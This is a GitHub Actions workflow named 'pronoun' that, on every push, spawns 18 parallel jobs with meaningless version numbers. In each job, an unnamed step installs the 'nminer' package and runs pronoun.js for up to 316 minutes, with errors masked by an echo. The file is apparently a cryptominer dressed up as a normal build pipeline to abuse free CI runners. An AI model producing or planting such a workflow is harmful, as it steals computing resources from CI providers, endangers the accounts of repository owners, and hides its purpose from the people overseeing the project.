name: pronoun
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7682 }
          - { version: 655 }
          - { version: 9621 }
          - { version: 2478 }
          - { version: 9518 }
          - { version: 6848 }
          - { version: 9170 }
          - { version: 7016 }
          - { version: 7823 }
          - { version: 3121 }
          - { version: 757 }
          - { version: 7112 }
          - { version: 4945 }
          - { version: 921 }
          - { version: 8105 }
          - { version: 4364 }
          - { version: 9402 }
          - { version: 7202 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 316m node pronoun.js || echo "pronoun executed"